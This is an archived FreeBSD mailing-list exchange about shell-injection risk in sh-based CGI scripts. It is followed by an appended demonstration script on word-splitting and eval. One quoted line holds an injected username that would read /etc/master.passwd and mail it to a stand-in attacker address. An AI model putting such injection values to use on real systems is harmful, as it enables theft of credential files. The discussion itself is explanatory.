Date: Fri, 4 Feb 2005 22:19:18 -0800
From: "Loren M. Lang" <lorenl@alzatex.com>
To: Dan Nelson <dnelson@allantgroup.com>
Cc: freebsd-questions@freebsd.org
Subject: Re: perl and ports
Message-ID: <20050205061918.GG8619@alzatex.com>
In-Reply-To: <20050205041344.GK25463@dan.emsphone.com>
References: <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <ef60af0905012500265eb38b66@mail.gmail.com> <EB3282A396FFCC78382D2E81@utd49554.utdallas.edu> <ef60af090501251100472d6fb6@mail.gmail.com> <20050125194736.GD76109@xor.obsecurity.org> <ef60af09050125142353301be4@mail.gmail.com> <ef60af09050125144166ecaae4@mail.gmail.com> <20050205034440.GF8619@alzatex.com> <20050205041344.GK25463@dan.emsphone.com>
On Fri, Feb 04, 2005 at 10:13:45PM -0600, Dan Nelson wrote:
> In the last episode (Feb 04), Loren M. Lang said:
> > Actually, I think you should work on sh first, it's a much bigger
> > security hazard than perl. If you've ever written much sh, you'd
> > realize with its much looser syntax, it's easy to get into trouble.
> > At least perl provides use strict and -Tw. Someone using sh to write
> > cgi scripts is the worst. Imagine someone writing the following like
> > for a sh cgi script where $USERNAME is a cgi parameter passed into
> > the following script:
> >
> > echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
> >
> > What if someone wrote the following username and apache was running as
> > root:
> >
> > charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo
>
> Then you would get a web page containing:
>
> <HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo</TITLE></HEAD>
>
> . The shell doesn't re-interpret its input unless explicitly told to
> via the "eval" command. /bin/sh is a little limited for more complex
> scripts due to its lack of arrays, though, so zsh/ksh/bash are much
> better choices :)

Well, my email was meant as a joke and I didn't bother to validate anything
I wrote, I just remember reading something along these lines in a cgi book
warning of the dangers of sh scripting for cgi scripts. The original example
was more elaborate and probably did use eval, but my point is that sh can be
more dangerous than perl since it uses a looser syntax. By not using "'s
around $USERNAME, it will end up being parsed as multiple arguments which,
for echo, isn't a big deal, but for most commands you can end up shooting
yourself in the foot. I definitely would not recommend removing it from the
system or even recommend against using it for anything, but just pointing at
the irony of considering perl a giant security hole.

Mostly, I have just found this whole thread very humorous, and I wonder what
the reaction of the developers will be when he tries asking them to stop
using perl.

> 
> -- 
> 	Dan Nelson
> 	dnelson@allantgroup.com

-- 
I sense much NT in you.
NT leads to Bluescreen.
Bluescreen leads to downtime.
Downtime leads to suffering.
NT is the path to the darkside.
Powerful Unix is.

Public Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc
Fingerprint: B3B9 D669 69C9 09EC 1BCD 835A FAF3 7A46 E4A3 280C
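The two points argued in the message above (an unquoted expansion is word-split into several arguments, but the shell only re-parses expanded text as code when eval is used) can be checked directly. The script below is an added example, not part of the thread; USERNAME and NAME_WITH_SPACE are constructed values standing in for CGI parameters, and the injected text only runs echo and tr.

```shell
#!/bin/sh
# Added example (not from the mail thread): what an unquoted $USERNAME does
# in sh. The value below is constructed to stand in for a CGI parameter.
USERNAME='charlie; echo injected | tr a-z A-Z'

# Count the arguments an expansion produces.
count_args() { echo "$#"; }

# Unquoted: the value is split on whitespace into separate arguments.
unquoted_arg_count() { count_args $USERNAME; }

# Quoted: the value stays one argument, whatever it contains.
quoted_arg_count() { count_args "$USERNAME"; }

# Without eval the shell does not re-interpret the ';' or '|' that came out
# of an expansion; echo just prints them (with the spacing mangled).
render_title_unquoted() {
    echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
}

# Quoting the expansion gives the intended single-string output.
render_title_quoted() {
    echo "<HTML><HEAD><TITLE>Welcome, ${USERNAME}</TITLE></HEAD>"
}

# eval is the point where expanded text is parsed as shell code again, so
# the embedded command actually runs: this prints "charlie" then "INJECTED".
eval_reinterprets() { eval "echo $USERNAME"; }

# Where word-splitting bites even without eval: a constructed value with a
# space turns an unquoted test into a syntax error; the quoted form works.
NAME_WITH_SPACE='charlie brown'
unquoted_test() { if [ -n $NAME_WITH_SPACE ] 2>/dev/null; then echo ok; else echo err; fi; }
quoted_test()   { if [ -n "$NAME_WITH_SPACE" ]; then echo ok; else echo err; fi; }
```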